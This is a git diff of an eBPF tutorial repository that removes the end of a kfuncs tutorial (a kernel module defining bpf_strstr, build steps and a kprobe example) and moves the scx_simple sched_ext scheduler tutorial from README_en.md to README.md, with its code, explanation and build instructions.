-MODULE_AUTHOR("Your Name"); // Module author -MODULE_DESCRIPTION("A simple module"); // Module description -MODULE_VERSION("1.0"); // Module version -``` - -**Explanation of the Code:** - -- **Declaring the kfunc:** The `__bpf_kfunc` macro declares a function that eBPF programs can invoke. Here, `bpf_strstr` performs a substring search within a given string. - -- **BTF Definitions:** The `__bpf_kfunc_start_defs` and `__bpf_kfunc_end_defs` macros demarcate the beginning and end of kfunc definitions. The `BTF_KFUNCS_START` and related macros assist in registering the kfuncs with the BPF Type Format (BTF). - -- **Module Initialization:** The `hello_init` function registers the kfunc ID set, making `bpf_strstr` available to eBPF programs of type `BPF_PROG_TYPE_KPROBE`. - -- **Module Cleanup:** The `hello_exit` function ensures that the kfunc ID set is unregistered upon module removal, maintaining system cleanliness. - -#### **File: `Makefile`** - -```makefile -obj-m += hello.o # hello.o is the target - -# Enable BTF generation -KBUILD_CFLAGS += -g -O2 - -all: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules - -clean: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean -``` - -**Explanation of the Makefile:** - -- **Target Definition:** `obj-m += hello.o` specifies that `hello.o` is the module to be built. - -- **BTF Generation Flags:** `KBUILD_CFLAGS += -g -O2` enables debug information and optimization, facilitating BTF generation. - -- **Build Commands:** - - **`all`:** Compiles the kernel module by invoking the kernel build system. - - **`clean`:** Cleans up the build artifacts. - -**Note:** The provided code has been tested on Linux kernel version **6.11**. If you're using an earlier version, you might need to implement workarounds, such as referencing `compact.h`. - -### Compiling the Kernel Module - -With the kernel module source and Makefile in place, follow these steps to compile the module: - -1. **Navigate to the Module Directory:** - - ```bash - cd /path/to/bpf-developer-tutorial/src/43-kfuncs/module/ - ``` - -2. **Compile the Module:** - - ```bash - make - ``` - - This command will generate a file named `hello.ko`, which is the compiled kernel module. - -### Loading the Kernel Module - -To insert the compiled module into the kernel, use the `insmod` command: - -```bash -sudo insmod hello.ko -``` - -### Verifying Module Loading - -After loading the module, verify its successful insertion by checking the kernel logs: - -```bash -dmesg | tail -``` - -**Expected Output:** - -```txt -[ 1234.5678] Hello, world! -[ 1234.5679] bpf_kfunc_example: Module loaded successfully -``` - -### Removing the Kernel Module - -When you no longer need the module, unload it using the `rmmod` command: - -```bash -sudo rmmod hello -``` - -**Verify Removal:** - -```bash -dmesg | tail -``` - -**Expected Output:** - -```txt -[ 1234.9876] Goodbye, world! -``` - -## Handling Compilation Errors - -During the compilation process, you might encounter the following error: - -```txt -Skipping BTF generation for /root/bpf-developer-tutorial/src/43-kfuncs/module/hello.ko due to unavailability of vmlinux -``` - -**Solution:** - -1. **Install the `dwarves` Package:** - - The `dwarves` package provides tools necessary for BTF generation. - - ```sh - sudo apt install dwarves - ``` - -2. **Copy the `vmlinux` File:** - - Ensure that the `vmlinux` file, which contains BTF information, is available in the build directory. - - ```sh - sudo cp /sys/kernel/btf/vmlinux /usr/lib/modules/$(uname -r)/build/ - ``` - - This command copies the `vmlinux` file to the appropriate build directory, enabling successful BTF generation. - -The complete code for this tutorial can be found in the [bpf-developer-tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/43-kfuncs) on GitHub. This is tested on Linux kernel version 6.11, and some modifications may be required for lower versions, referring to `compact.h`. - -## Utilizing Your Custom kfunc in an eBPF Program - -With the kernel module defining your custom `strstr` kfunc in place, the next step is to create an eBPF program that leverages this function. This interaction showcases the enhanced capabilities introduced by kfuncs. - -### Writing the eBPF Program - -Create an eBPF program that attaches to the `do_unlinkat` kernel function and uses the custom `bpf_strstr` kfunc. - -#### **File: `kfunc.c`** - -```c -/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ -#define BPF_NO_GLOBAL_DATA -#include -#include -#include - -typedef unsigned int u32; -typedef long long s64; - -/* Declare the external kfunc */ -extern int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz) __ksym; - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -SEC("kprobe/do_unlinkat") -int handle_kprobe(struct pt_regs *ctx) -{ - pid_t pid = bpf_get_current_pid_tgid() >> 32; - char str[] = "Hello, world!"; - char substr[] = "wor"; - int result = bpf_strstr(str, sizeof(str) - 1, substr, sizeof(substr) - 1); - if (result != -1) - { - bpf_printk("'%s' found in '%s' at index %d\n", substr, str, result); - } - bpf_printk("Hello, world! (pid: %d) bpf_strstr %d\n", pid, result); - return 0; -} -``` - -**Explanation of the eBPF Code:** - -- **External kfunc Declaration:** The `extern` keyword declares the `bpf_strstr` function, making it accessible within the eBPF program. - -- **Kprobe Attachment:** The `SEC("kprobe/do_unlinkat")` macro attaches the eBPF program to the `do_unlinkat` kernel function. Every time `do_unlinkat` is invoked, the `handle_kprobe` function executes. - -- **Using the kfunc:** Within `handle_kprobe`, the eBPF program calls `bpf_strstr` with four arguments: - - `str`: The main string to search within. - - `str__sz`: The size of the main string. - - `substr`: The substring to search for. - - `substr__sz`: The size of the substring. - - The result, which is the index of the first occurrence of `substr` in `str` or `-1` if not found, is then printed using `bpf_printk`, displaying both the PID and the result. - -**Important Note:** Implementing a `strstr`-like function directly in eBPF is challenging due to verifier restrictions that limit loops and complex memory accesses. By implementing `strstr` as a kfunc, we bypass these limitations, allowing for more complex and efficient string operations within eBPF programs. - -### Compiling the eBPF Program - -To compile the eBPF program, ensure you have the necessary tools installed, such as `clang` and `llvm`. Here's how you can compile the program: - -1. **Navigate to the eBPF Program Directory:** - - ```bash - cd /path/to/bpf-developer-tutorial/src/43-kfuncs/ - ``` - -2. **Create a `Makefile` for the eBPF Program:** - - ```makefile - # File: Makefile - - CLANG ?= clang - LLVM_STRIP ?= llvm-strip - BPF_TARGET := bpf - - CFLAGS := -O2 -g -target $(BPF_TARGET) -Wall -Werror -I/usr/include - - all: kfunc.o - - kfunc.o: kfunc.c - $(CLANG) $(CFLAGS) -c $< -o $@ - - clean: - rm -f kfunc.o - ``` - -3. **Compile the eBPF Program:** - - ```bash - make - ``` - - This command will generate a file named `kfunc.o`, which is the compiled eBPF object file. - -### Running the eBPF Program - -Assuming you have a user-space application or a tool to load and attach the eBPF program, you can execute it to observe the interaction between the eBPF program and the custom kfunc. - -**Sample Output:** - -```bash -# sudo ./load_kfunc -BPF program loaded and attached successfully. Press Ctrl-C to exit. -``` - -Then, when the `do_unlinkat` function is invoked (e.g., when a file is unlinked), you can check the kernel logs: - -```bash -dmesg | tail -``` - -**Expected Output:** - -```txt -[ 1234.5678] 'wor' found in 'Hello, world!' at index 7 -[ 1234.5679] Hello, world! (pid: 2075) bpf_strstr 7 -``` - -**Explanation of the Output:** - -Each time the `do_unlinkat` function is invoked in the kernel, the eBPF program prints a message indicating the PID of the process and the result of the kfunc call. In this example, the substring `"wor"` is found at index `7` in the string `"Hello, world!"`. - -## Summary and Conclusion - -In this tutorial, we've delved deep into extending eBPF's capabilities by defining and utilizing custom kernel functions (kfuncs). Here's a recap of what we've covered: - -- **Understanding kfuncs:** Grasped the concept of kfuncs and their role in enhancing eBPF beyond standard helper functions. -- **Defining kfuncs:** Created a kernel module that defines a custom `strstr` kfunc, ensuring it can be safely exposed to eBPF programs without altering the core kernel. -- **Writing eBPF Programs with kfuncs:** Developed an eBPF program that leverages the custom kfunc to perform specific operations, demonstrating the enhanced functionality. -- **Compilation and Execution:** Provided a step-by-step guide to compile, load, and run both the kernel module and the eBPF program, ensuring you can replicate the setup on your own system. -- **Error Handling:** Addressed potential compilation issues and offered solutions to ensure a smooth development experience. - -**Key Takeaways:** - -- **Overcoming Helper Limitations:** kfuncs bridge the gaps left by standard eBPF helpers, offering extended functionality tailored to specific needs. -- **Maintaining System Stability:** By encapsulating kfuncs within kernel modules, you ensure that system stability is maintained without making invasive changes to the kernel. -- **Community-Driven Evolution:** The rapid growth and adoption of kfuncs highlight the eBPF community's commitment to pushing the boundaries of what's possible with kernel-level programming. -- **Leveraging Existing kfuncs:** Before defining new kfuncs, explore the existing ones provided by the kernel. They cover a wide range of functionalities, reducing the need to create custom functions unless absolutely necessary. - -**Ready to elevate your eBPF skills even further?** [Visit our tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial) and [explore more tutorials on our website](https://eunomia.dev/tutorials/). Dive into a wealth of examples, deepen your understanding, and contribute to the dynamic world of eBPF! - -Happy eBPF-ing! - -## References - -- [BPF Kernel Functions Documentation](https://docs.kernel.org/bpf/kfuncs.html) -- [eBPF kfuncs Guide](https://docs.ebpf.io/linux/kfuncs/) - -## Additional Resources - -If you'd like to learn more about eBPF knowledge and practices, you can visit our open-source tutorial code repository at [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [eunomia.dev/tutorials](https://eunomia.dev/tutorials/) for more examples and complete code. diff --git a/src/43-kfuncs/module/README.md b/src/43-kfuncs/module/README.zh.md similarity index 100% rename from src/43-kfuncs/module/README.md rename to src/43-kfuncs/module/README.zh.md diff --git a/src/44-scx-simple/README.md b/src/44-scx-simple/README.md index e69de29..4147a9c 100644 --- a/src/44-scx-simple/README.md +++ b/src/44-scx-simple/README.md @@ -0,0 +1,425 @@ +# eBPF Tutorial: Introduction to the BPF Scheduler + +Welcome to our deep dive into the world of eBPF with a focus on the BPF scheduler! If you're looking to extend your eBPF knowledge beyond the basics, you're in the right place. In this tutorial, we'll explore the **scx_simple scheduler**, a minimal example of the sched_ext scheduler class introduced in Linux kernel version `6.12`. We'll walk you through its architecture, how it leverages BPF programs to define scheduling behavior, and guide you through compiling and running the example. By the end, you'll have a solid understanding of how to create and manage advanced scheduling policies using eBPF. + +## Understanding the Extensible BPF Scheduler + +At the heart of this tutorial is the **sched_ext** scheduler class. Unlike traditional schedulers, sched_ext allows its behavior to be defined dynamically through a set of BPF programs, making it highly flexible and customizable. This means you can implement any scheduling algorithm on top of sched_ext, tailored to your specific needs. + +### Key Features of sched_ext + +- **Flexible Scheduling Algorithms:** Implement any scheduling policy by writing BPF programs. +- **Dynamic CPU Grouping:** The BPF scheduler can group CPUs as needed, without tying tasks to specific CPUs upon wakeup. +- **Runtime Control:** Enable or disable the BPF scheduler on-the-fly without rebooting. +- **System Integrity:** Even if the BPF scheduler encounters errors, the system gracefully reverts to the default scheduling behavior. +- **Debugging Support:** Comprehensive debug information is available through the `sched_ext_dump` tracepoint and SysRq key sequences. + +With these features, sched_ext provides a robust foundation for experimenting with and deploying advanced scheduling strategies. + +## Introducing scx_simple: A Minimal sched_ext Scheduler + +The **scx_simple** scheduler is a straightforward example of a sched_ext scheduler in the linux tools. It's designed to be easy to understand and serves as a foundation for more complex scheduling policies. scx_simple can operate in two modes: + +1. **Global Weighted Virtual Time (vtime) Mode:** Prioritizes tasks based on their virtual time, allowing for fair scheduling across different workloads. +2. **FIFO (First-In-First-Out) Mode:** Simple queue-based scheduling where tasks are executed in the order they arrive. + +### Use Case and Suitability + +scx_simple is particularly effective on single-socket CPUs with a uniform L3 cache topology. While the global FIFO mode can handle many workloads efficiently, it's essential to note that saturating threads might overshadow less active ones. Therefore, scx_simple is best suited for environments where a straightforward scheduling policy meets the performance and fairness requirements. + +### Production Readiness + +While scx_simple is minimalistic, it can be deployed in production settings under the right conditions: + +- **Hardware Constraints:** Best suited for systems with single-socket CPUs and uniform cache architectures. +- **Workload Characteristics:** Ideal for workloads that don't require intricate scheduling policies and can benefit from simple FIFO or weighted vtime scheduling. + +## Diving into the Code: Kernel and User-Space Analysis + +Let's explore how scx_simple is implemented both in the kernel and user-space. We'll start by presenting the complete code snippets and then break down their functionalities. + +### Kernel-Side Implementation + +```c +#include + +char _license[] SEC("license") = "GPL"; + +const volatile bool fifo_sched; + +static u64 vtime_now; +UEI_DEFINE(uei); + +/* + * Built-in DSQs such as SCX_DSQ_GLOBAL cannot be used as priority queues + * (meaning, cannot be dispatched to with scx_bpf_dispatch_vtime()). We + * therefore create a separate DSQ with ID 0 that we dispatch to and consume + * from. If scx_simple only supported global FIFO scheduling, then we could + * just use SCX_DSQ_GLOBAL. + */ +#define SHARED_DSQ 0 + +struct { + __uint(type, BPF_MAP_TYPE_PERCPU_ARRAY); + __uint(key_size, sizeof(u32)); + __uint(value_size, sizeof(u64)); + __uint(max_entries, 2); /* [local, global] */ +} stats SEC(".maps"); + +static void stat_inc(u32 idx) +{ + u64 *cnt_p = bpf_map_lookup_elem(&stats, &idx); + if (cnt_p) + (*cnt_p)++; +} + +static inline bool vtime_before(u64 a, u64 b) +{ + return (s64)(a - b) < 0; +} + +s32 BPF_STRUCT_OPS(simple_select_cpu, struct task_struct *p, s32 prev_cpu, u64 wake_flags) +{ + bool is_idle = false; + s32 cpu; + + cpu = scx_bpf_select_cpu_dfl(p, prev_cpu, wake_flags, &is_idle); + if (is_idle) { + stat_inc(0); /* count local queueing */ + scx_bpf_dispatch(p, SCX_DSQ_LOCAL, SCX_SLICE_DFL, 0); + } + + return cpu; +} + +void BPF_STRUCT_OPS(simple_enqueue, struct task_struct *p, u64 enq_flags) +{ + stat_inc(1); /* count global queueing */ + + if (fifo_sched) { + scx_bpf_dispatch(p, SHARED_DSQ, SCX_SLICE_DFL, enq_flags); + } else { + u64 vtime = p->scx.dsq_vtime; + + /* + * Limit the amount of budget that an idling task can accumulate + * to one slice. + */ + if (vtime_before(vtime, vtime_now - SCX_SLICE_DFL)) + vtime = vtime_now - SCX_SLICE_DFL; + + scx_bpf_dispatch_vtime(p, SHARED_DSQ, SCX_SLICE_DFL, vtime, + enq_flags); + } +} + +void BPF_STRUCT_OPS(simple_dispatch, s32 cpu, struct task_struct *prev) +{ + scx_bpf_consume(SHARED_DSQ); +} + +void BPF_STRUCT_OPS(simple_running, struct task_struct *p) +{ + if (fifo_sched) + return; + + /* + * Global vtime always progresses forward as tasks start executing. The + * test and update can be performed concurrently from multiple CPUs and + * thus racy. Any error should be contained and temporary. Let's just + * live with it. + */ + if (vtime_before(vtime_now, p->scx.dsq_vtime)) + vtime_now = p->scx.dsq_vtime; +} + +void BPF_STRUCT_OPS(simple_stopping, struct task_struct *p, bool runnable) +{ + if (fifo_sched) + return; + + /* + * Scale the execution time by the inverse of the weight and charge. + * + * Note that the default yield implementation yields by setting + * @p->scx.slice to zero and the following would treat the yielding task + * as if it has consumed all its slice. If this penalizes yielding tasks + * too much, determine the execution time by taking explicit timestamps + * instead of depending on @p->scx.slice. + */ + p->scx.dsq_vtime += (SCX_SLICE_DFL - p->scx.slice) * 100 / p->scx.weight; +} + +void BPF_STRUCT_OPS(simple_enable, struct task_struct *p) +{ + p->scx.dsq_vtime = vtime_now; +} + +s32 BPF_STRUCT_OPS_SLEEPABLE(simple_init) +{ + return scx_bpf_create_dsq(SHARED_DSQ, -1); +} + +void BPF_STRUCT_OPS(simple_exit, struct scx_exit_info *ei) +{ + UEI_RECORD(uei, ei); +} + +SCX_OPS_DEFINE(simple_ops, + .select_cpu = (void *)simple_select_cpu, + .enqueue = (void *)simple_enqueue, + .dispatch = (void *)simple_dispatch, + .running = (void *)simple_running, + .stopping = (void *)simple_stopping, + .enable = (void *)simple_enable, + .init = (void *)simple_init, + .exit = (void *)simple_exit, + .name = "simple"); +``` + +#### Kernel-Side Breakdown + +The kernel-side implementation of scx_simple defines how tasks are selected, enqueued, dispatched, and managed. Here's a high-level overview: + +1. **Initialization and Licensing:** + - The scheduler is licensed under GPL. + - A global variable `fifo_sched` determines the scheduling mode (FIFO or weighted vtime). + +2. **Dispatch Queue (DSQ) Management:** + - A shared DSQ (`SHARED_DSQ`) with ID 0 is created to handle task dispatching. + - A `stats` map tracks the number of tasks queued locally and globally. + +3. **CPU Selection (`simple_select_cpu`):** + - Selects the CPU for a waking task. + - If the selected CPU is idle, the task is immediately dispatched to the local DSQ. + +4. **Task Enqueueing (`simple_enqueue`):** + - Depending on the `fifo_sched` flag, tasks are either dispatched to the shared DSQ in FIFO mode or to a priority queue based on virtual time. + - Virtual time (`vtime`) ensures fair scheduling by accounting for task execution time and weight. + +5. **Task Dispatching (`simple_dispatch`):** + - Consumes tasks from the shared DSQ and assigns them to CPUs. + +6. **Running and Stopping Tasks (`simple_running` & `simple_stopping`):** + - Manages the progression of virtual time for tasks, ensuring that scheduling decisions remain fair and balanced. + +7. **Enabling and Exiting:** + - Handles the enabling of the scheduler and records exit information for debugging. + +This modular structure allows scx_simple to be both simple and effective, providing a clear example of how to implement custom scheduling policies using eBPF. + +### User-Space Implementation + +```c +static void read_stats(struct scx_simple *skel, __u64 *stats) +{ + int nr_cpus = libbpf_num_possible_cpus(); + __u64 cnts[2][nr_cpus]; + __u32 idx; + + memset(stats, 0, sizeof(stats[0]) * 2); + + for (idx = 0; idx < 2; idx++) { + int ret, cpu; + + ret = bpf_map_lookup_elem(bpf_map__fd(skel->maps.stats), + &idx, cnts[idx]); + if (ret < 0) + continue; + for (cpu = 0; cpu < nr_cpus; cpu++) + stats[idx] += cnts[idx][cpu]; + } +} + +int main(int argc, char **argv) +{ + struct scx_simple *skel; + struct bpf_link *link; + __u32 opt; + __u64 ecode; + + libbpf_set_print(libbpf_print_fn); + signal(SIGINT, sigint_handler); + signal(SIGTERM, sigint_handler); +restart: + skel = SCX_OPS_OPEN(simple_ops, scx_simple); + + while ((opt = getopt(argc, argv, "fvh")) != -1) { + switch (opt) { + case 'f': + skel->rodata->fifo_sched = true; + break; + case 'v': + verbose = true; + break; + default: + fprintf(stderr, help_fmt, basename(argv[0])); + return opt != 'h'; + } + } + + SCX_OPS_LOAD(skel, simple_ops, scx_simple, uei); + link = SCX_OPS_ATTACH(skel, simple_ops, scx_simple); + + while (!exit_req && !UEI_EXITED(skel, uei)) { + __u64 stats[2]; + + read_stats(skel, stats); + printf("local=%llu global=%llu\n", stats[0], stats[1]); + fflush(stdout); + sleep(1); + } + + bpf_link__destroy(link); + ecode = UEI_REPORT(skel, uei); + scx_simple__destroy(skel); + + if (UEI_ECODE_RESTART(ecode)) + goto restart; + return 0; +} +``` + +#### User-Space Breakdown + +The user-space component is responsible for interacting with the BPF scheduler, managing its lifecycle, and monitoring its performance. Here's a snapshot of its responsibilities: + +1. **Statistics Collection (`read_stats`):** + - Reads the number of tasks queued locally and globally from the BPF maps. + - Aggregates statistics across all CPUs for reporting. + +2. **Main Function Workflow:** + - **Initialization:** Sets up libbpf, handles signal interrupts, and opens the scx_simple BPF skeleton. + - **Argument Parsing:** Processes command-line options to toggle FIFO scheduling and verbosity. + - **Loading and Attaching:** Loads the BPF program and attaches it to the scheduler. + - **Monitoring Loop:** Continuously reads and prints scheduling statistics every second. + - **Cleanup:** Destroys BPF links and handles potential restarts based on exit codes. + +This user-space program provides a straightforward interface to monitor and control the scx_simple scheduler, making it easier to understand its behavior in real-time. + +## Deep Dive into Key Concepts + +To fully grasp how scx_simple operates, let's explore some of the underlying concepts and mechanisms: + +### Dispatch Queues (DSQs) + +DSQs are central to sched_ext's operation, acting as buffers where tasks are queued before being dispatched to CPUs. They can function as either FIFO queues or priority queues based on virtual time. + +- **Local DSQs (`SCX_DSQ_LOCAL`):** Each CPU has its own local DSQ, ensuring that tasks can be dispatched and consumed efficiently without contention. +- **Global DSQ (`SCX_DSQ_GLOBAL`):** A shared queue where tasks from all CPUs can be queued, providing a fallback when local queues are empty. +- **Custom DSQs:** Developers can create additional DSQs using `scx_bpf_create_dsq()` for more specialized scheduling needs. + +### Virtual Time (vtime) + +Virtual time is a mechanism to ensure fairness in scheduling by tracking how much time a task has consumed relative to its weight. In scx_simple's weighted vtime mode, tasks with higher weights consume virtual time more slowly, allowing lower-weighted tasks to run more frequently. + +### Scheduling Cycle + +Understanding the scheduling cycle is crucial for modifying or extending scx_simple: + +1. **Task Wakeup:** + - `ops.select_cpu()` is invoked to select an optimal CPU for the waking task. + - If the selected CPU is idle, the task is dispatched immediately to the local DSQ. + +2. **Task Enqueueing:** + - `ops.enqueue()` decides whether to dispatch the task to the global DSQ, a local DSQ, or a custom DSQ based on the scheduling mode. + +3. **Task Dispatching:** + - When a CPU is ready to schedule, it first checks its local DSQ, then the global DSQ, and finally invokes `ops.dispatch()` if needed. + +4. **Task Execution:** + - The CPU executes the selected task, updating its virtual time and ensuring fair scheduling. + +This cycle ensures that tasks are scheduled efficiently while maintaining fairness and responsiveness. + +## Compiling and Running scx_simple + +Getting scx_simple up and running involves setting up the necessary toolchain and configuring the kernel appropriately. Here's how you can compile and execute the example scheduler. + +### Toolchain Dependencies + +Before compiling scx_simple, ensure you have the following tools installed: + +1. **clang >= 16.0.0** + - Required for compiling BPF programs. While GCC is working on BPF support, it lacks essential features like BTF type tags necessary for certain functionalities. + +2. **pahole >= 1.25** + - Used to generate BTF from DWARF, which is crucial for type information in BPF programs. + +3. **rust >= 1.70.0** + - If you're working with Rust-based schedulers, ensure you have the appropriate Rust toolchain version. + +Additionally, tools like `make` are required for building the examples. + +### Kernel Configuration + +To enable and use sched_ext, ensure the following kernel configuration options are set: + +```plaintext +CONFIG_BPF=y +CONFIG_SCHED_CLASS_EXT=y +CONFIG_BPF_SYSCALL=y +CONFIG_BPF_JIT=y +CONFIG_DEBUG_INFO_BTF=y +CONFIG_BPF_JIT_ALWAYS_ON=y +CONFIG_BPF_JIT_DEFAULT_ON=y +CONFIG_PAHOLE_HAS_SPLIT_BTF=y +CONFIG_PAHOLE_HAS_BTF_TAG=y +``` + +These configurations enable the necessary features for BPF scheduling and ensure that sched_ext operates correctly. + +### Building scx_simple + +Navigate to the kernel's `tools/sched_ext/` directory and run: + +```bash +make +``` + +This command compiles the scx_simple scheduler along with its dependencies. + +### Running scx_simple + +Once compiled, you can execute the user-space program to load and monitor the scheduler: + +```bash +./scx_simple -f +``` + +The `-f` flag enables FIFO scheduling mode. You can also use `-v` for verbose output or `-h` for help. + +As the program runs, it will display the number of tasks queued locally and globally every second: + +```plaintext +local=123 global=456 +local=124 global=457 +... +``` + +### Switching Between sched_ext and CFS + +sched_ext operates alongside the default Completely Fair Scheduler (CFS). You can switch between sched_ext and CFS dynamically: + +- **Enable sched_ext:** Load the BPF scheduler using scx_simple. +- **Disable sched_ext:** Terminate the scx_simple program, reverting all tasks back to CFS. + +Additionally, using SysRq key sequences like `SysRq-S` can help manage the scheduler's state and trigger debug dumps with `SysRq-D`. + +## Summary and Next Steps + +In this tutorial, we've introduced the **sched_ext** scheduler class and walked through a minimal example, **scx_simple**, demonstrating how to define custom scheduling behaviors using eBPF programs. We've covered the architecture, key concepts like DSQs and virtual time, and provided step-by-step instructions for compiling and running the scheduler. + +By mastering scx_simple, you're well-equipped to design and implement more sophisticated scheduling policies tailored to your specific requirements. Whether you're optimizing for performance, fairness, or specific workload characteristics, sched_ext and eBPF offer the flexibility and power to achieve your goals. + +> Ready to take your eBPF skills to the next level? Dive deeper into our tutorials and explore more examples by visiting our [tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our [website](https://eunomia.dev/tutorials/). + +## References + +- **sched_ext Repository:** [https://github.com/sched-ext/scx](https://github.com/sched-ext/scx) +- **Linux Kernel Documentation:** [Scheduler Ext Documentation](https://www.kernel.org/doc/html/next/scheduler/sched-ext.html) +- **Kernel Source Tree:** [Linux Kernel sched_ext Tools](https://github.com/torvalds/linux/tree/master/tools/sched_ext) +- **eBPF Official Documentation:** [https://ebpf.io/docs/](https://ebpf.io/docs/) +- **libbpf Documentation:** [https://github.com/libbpf/libbpf](https://github.com/libbpf/libbpf) + +Feel free to explore these resources to expand your understanding and continue your journey into advanced eBPF programming! diff --git a/src/44-scx-simple/README.zh.md b/src/44-scx-simple/README.zh.md new file mode 100644 index 0000000..e69de29 diff --git a/src/44-scx-simple/README_en.md b/src/44-scx-simple/README_en.md deleted file mode 100644 index 4147a9c..0000000 --- a/src/44-scx-simple/README_en.md +++ /dev/null @@ -1,425 +0,0 @@ -# eBPF Tutorial: Introduction to the BPF Scheduler - -Welcome to our deep dive into the world of eBPF with a focus on the BPF scheduler! If you're looking to extend your eBPF knowledge beyond the basics, you're in the right place. In this tutorial, we'll explore the **scx_simple scheduler**, a minimal example of the sched_ext scheduler class introduced in Linux kernel version `6.12`. We'll walk you through its architecture, how it leverages BPF programs to define scheduling behavior, and guide you through compiling and running the example. By the end, you'll have a solid understanding of how to create and manage advanced scheduling policies using eBPF. - -## Understanding the Extensible BPF Scheduler - -At the heart of this tutorial is the **sched_ext** scheduler class. Unlike traditional schedulers, sched_ext allows its behavior to be defined dynamically through a set of BPF programs, making it highly flexible and customizable. This means you can implement any scheduling algorithm on top of sched_ext, tailored to your specific needs. - -### Key Features of sched_ext - -- **Flexible Scheduling Algorithms:** Implement any scheduling policy by writing BPF programs. -- **Dynamic CPU Grouping:** The BPF scheduler can group CPUs as needed, without tying tasks to specific CPUs upon wakeup. -- **Runtime Control:** Enable or disable the BPF scheduler on-the-fly without rebooting. -- **System Integrity:** Even if the BPF scheduler encounters errors, the system gracefully reverts to the default scheduling behavior. -- **Debugging Support:** Comprehensive debug information is available through the `sched_ext_dump` tracepoint and SysRq key sequences. - -With these features, sched_ext provides a robust foundation for experimenting with and deploying advanced scheduling strategies. - -## Introducing scx_simple: A Minimal sched_ext Scheduler - -The **scx_simple** scheduler is a straightforward example of a sched_ext scheduler in the linux tools. It's designed to be easy to understand and serves as a foundation for more complex scheduling policies. scx_simple can operate in two modes: - -1. **Global Weighted Virtual Time (vtime) Mode:** Prioritizes tasks based on their virtual time, allowing for fair scheduling across different workloads. -2. **FIFO (First-In-First-Out) Mode:** Simple queue-based scheduling where tasks are executed in the order they arrive. - -### Use Case and Suitability - -scx_simple is particularly effective on single-socket CPUs with a uniform L3 cache topology. While the global FIFO mode can handle many workloads efficiently, it's essential to note that saturating threads might overshadow less active ones. Therefore, scx_simple is best suited for environments where a straightforward scheduling policy meets the performance and fairness requirements. - -### Production Readiness - -While scx_simple is minimalistic, it can be deployed in production settings under the right conditions: - -- **Hardware Constraints:** Best suited for systems with single-socket CPUs and uniform cache architectures. -- **Workload Characteristics:** Ideal for workloads that don't require intricate scheduling policies and can benefit from simple FIFO or weighted vtime scheduling. - -## Diving into the Code: Kernel and User-Space Analysis - -Let's explore how scx_simple is implemented both in the kernel and user-space. We'll start by presenting the complete code snippets and then break down their functionalities. - -### Kernel-Side Implementation - -```c -#include - -char _license[] SEC("license") = "GPL"; - -const volatile bool fifo_sched; - -static u64 vtime_now; -UEI_DEFINE(uei); - -/* - * Built-in DSQs such as SCX_DSQ_GLOBAL cannot be used as priority queues - * (meaning, cannot be dispatched to with scx_bpf_dispatch_vtime()). We - * therefore create a separate DSQ with ID 0 that we dispatch to and consume - * from. If scx_simple only supported global FIFO scheduling, then we could - * just use SCX_DSQ_GLOBAL. - */ -#define SHARED_DSQ 0 - -struct { - __uint(type, BPF_MAP_TYPE_PERCPU_ARRAY); - __uint(key_size, sizeof(u32)); - __uint(value_size, sizeof(u64)); - __uint(max_entries, 2); /* [local, global] */ -} stats SEC(".maps"); - -static void stat_inc(u32 idx) -{ - u64 *cnt_p = bpf_map_lookup_elem(&stats, &idx); - if (cnt_p) - (*cnt_p)++; -} - -static inline bool vtime_before(u64 a, u64 b) -{ - return (s64)(a - b) < 0; -} - -s32 BPF_STRUCT_OPS(simple_select_cpu, struct task_struct *p, s32 prev_cpu, u64 wake_flags) -{ - bool is_idle = false; - s32 cpu; - - cpu = scx_bpf_select_cpu_dfl(p, prev_cpu, wake_flags, &is_idle); - if (is_idle) { - stat_inc(0); /* count local queueing */ - scx_bpf_dispatch(p, SCX_DSQ_LOCAL, SCX_SLICE_DFL, 0); - } - - return cpu; -} - -void BPF_STRUCT_OPS(simple_enqueue, struct task_struct *p, u64 enq_flags) -{ - stat_inc(1); /* count global queueing */ - - if (fifo_sched) { - scx_bpf_dispatch(p, SHARED_DSQ, SCX_SLICE_DFL, enq_flags); - } else { - u64 vtime = p->scx.dsq_vtime; - - /* - * Limit the amount of budget that an idling task can accumulate - * to one slice. - */ - if (vtime_before(vtime, vtime_now - SCX_SLICE_DFL)) - vtime = vtime_now - SCX_SLICE_DFL; - - scx_bpf_dispatch_vtime(p, SHARED_DSQ, SCX_SLICE_DFL, vtime, - enq_flags); - } -} - -void BPF_STRUCT_OPS(simple_dispatch, s32 cpu, struct task_struct *prev) -{ - scx_bpf_consume(SHARED_DSQ); -} - -void BPF_STRUCT_OPS(simple_running, struct task_struct *p) -{ - if (fifo_sched) - return; - - /* - * Global vtime always progresses forward as tasks start executing. The - * test and update can be performed concurrently from multiple CPUs and - * thus racy. Any error should be contained and temporary. Let's just - * live with it. - */ - if (vtime_before(vtime_now, p->scx.dsq_vtime)) - vtime_now = p->scx.dsq_vtime; -} - -void BPF_STRUCT_OPS(simple_stopping, struct task_struct *p, bool runnable) -{ - if (fifo_sched) - return; - - /* - * Scale the execution time by the inverse of the weight and charge. - * - * Note that the default yield implementation yields by setting - * @p->scx.slice to zero and the following would treat the yielding task - * as if it has consumed all its slice. If this penalizes yielding tasks - * too much, determine the execution time by taking explicit timestamps - * instead of depending on @p->scx.slice. - */ - p->scx.dsq_vtime += (SCX_SLICE_DFL - p->scx.slice) * 100 / p->scx.weight; -} - -void BPF_STRUCT_OPS(simple_enable, struct task_struct *p) -{ - p->scx.dsq_vtime = vtime_now; -} - -s32 BPF_STRUCT_OPS_SLEEPABLE(simple_init) -{ - return scx_bpf_create_dsq(SHARED_DSQ, -1); -} - -void BPF_STRUCT_OPS(simple_exit, struct scx_exit_info *ei) -{ - UEI_RECORD(uei, ei); -} - -SCX_OPS_DEFINE(simple_ops, - .select_cpu = (void *)simple_select_cpu, - .enqueue = (void *)simple_enqueue, - .dispatch = (void *)simple_dispatch, - .running = (void *)simple_running, - .stopping = (void *)simple_stopping, - .enable = (void *)simple_enable, - .init = (void *)simple_init, - .exit = (void *)simple_exit, - .name = "simple"); -``` - -#### Kernel-Side Breakdown - -The kernel-side 